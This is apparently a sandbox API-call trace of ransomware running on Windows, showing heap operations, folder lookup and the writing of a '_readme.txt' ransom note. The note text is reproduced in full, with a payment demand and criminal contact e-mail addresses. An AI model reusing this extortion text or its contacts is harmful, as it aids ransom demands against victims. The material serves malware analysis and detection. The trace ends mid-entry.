RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.294] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0184.294] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.295] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.295] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.295] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0184.295] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.295] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.295] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.295] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0184.296] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.296] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.296] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.296] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0184.296] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0184.297] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.297] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0184.297] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.297] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.297] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0184.298] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.298] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.298] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.298] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0184.298] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.298] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.298] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.299] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0184.299] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.299] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.299] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.299] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0184.299] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.300] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.300] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.300] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0184.300] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.301] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.301] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.301] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0184.301] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0184.301] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.302] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0184.302] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.302] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.302] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0184.302] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.303] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.303] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.303] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0184.303] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.303] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.303] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.303] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0184.304] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.304] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.304] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.304] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0184.304] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.305] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.305] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.305] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0184.305] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.306] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.306] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.306] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0184.306] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.306] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.306] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.306] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0184.307] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.307] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.307] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.307] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0184.308] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.308] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.308] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.308] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0184.308] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.309] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.309] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.309] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0184.309] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0184.309] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.309] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0184.310] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.310] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.310] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0184.310] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.310] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.311] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.311] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0184.311] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.311] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.311] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.311] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x850) returned 0x2e765d0 [0184.312] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.312] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.312] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.312] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0184.312] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.313] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.313] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.313] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e765d0 [0184.313] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.313] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.313] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.313] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0184.313] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x2e902a8 [0184.314] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.314] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e902a8 | out: hHeap=0x620000) returned 1 [0184.314] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.314] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.314] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e765d0 [0184.315] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.315] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.315] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.315] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0184.315] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.316] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83688 | out: hHeap=0x620000) returned 1 [0184.316] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.316] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e765d0 [0184.316] PathFindFileNameW (pszPath="C:\\Boot\\pl-PL\\") returned="pl-PL\\" [0184.316] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.316] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0184.316] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0184.316] PathFindFileNameW (pszPath="") returned="" [0184.316] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e837c8 [0184.316] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x74ff0000 [0184.317] GetProcAddress (hModule=0x74ff0000, lpProcName="SHGetFolderPathW") returned 0x75075708 [0184.317] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x800) returned 0x2e902a8 [0184.317] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x2e902a8 | out: pszPath="C:\\Users\\kEecfMwgj") returned 0x0 [0184.317] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x810) returned 0x2e765d0 [0184.317] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83688 [0184.317] FreeLibrary (hLibModule=0x74ff0000) returned 1 [0184.317] PathAppendW (in: pszPath="C:\\Boot\\pl-PL\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\pl-PL\\_readme.txt") returned 1 [0184.317] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0184.317] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.317] PathFileExistsW (pszPath="C:\\Boot\\pl-PL\\_readme.txt") returned 0 [0184.318] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x7d00) returned 0x2e93a68 [0184.318] lstrcpyW (in: lpString1=0x2e93a68, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd" [0184.318] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531Jhyjd", lpString2="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-QsoSRIeAK6\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@bestyourmail.ch\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelp@airmail.cc\r\n\r\nYour personal ID:\r\n0531JhyjduyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt" [0184.318] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e77f68 [0184.318] CreateFileW (lpFileName="C:\\Boot\\pl-PL\\_readme.txt" (normalized: "c:\\boot\\pl-pl\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0184.319] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e77f68 | out: hHeap=0x620000) returned 1 [0184.319] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e93a68 | out: hHeap=0x620000) returned 1 [0184.319] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e765d0 | out: hHeap=0x620000) returned 1 [0184.319] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.320] FindFirstFileW (in: lpFileName="C:\\Boot\\pl-PL\\*" (normalized: "c:\\boot\\pl-pl\\*"), lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956d02a0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28dd07a0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28dd07a0, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cfe100 [0184.320] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.320] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x956d02a0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28dd07a0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0x28dd07a0, ftLastWriteTime.dwHighDateTime=0x1d706aa, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0184.320] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956d02a0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28dd07a0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe9e5ad4a, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0184.320] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x956d02a0, ftCreationTime.dwHighDateTime=0x1d70554, ftLastAccessTime.dwLowDateTime=0x28dd07a0, ftLastAccessTime.dwHighDateTime=0x1d706aa, ftLastWriteTime.dwLowDateTime=0xe9e5ad4a, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0184.320] FindClose (in: hFindFile=0x2cfe100 | out: hFindFile=0x2cfe100) returned 1 [0184.321] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.321] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83700 | out: hHeap=0x620000) returned 1 [0184.321] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83700 [0184.321] PeekMessageW (in: lpMsg=0x312fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x312fb74) returned 0 [0184.321] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.321] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0184.322] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.322] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.322] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.322] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0184.322] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.322] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.322] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.323] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0184.323] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.323] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.323] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.323] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0184.323] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.324] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.324] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.324] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x2e776e0 [0184.324] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.324] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.324] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.324] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x2e776e0 [0184.325] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e776e0 | out: hHeap=0x620000) returned 1 [0184.325] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e838b8 | out: hHeap=0x620000) returned 1 [0184.325] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e838b8 [0184.325] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x2e776e0 [0184.325] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 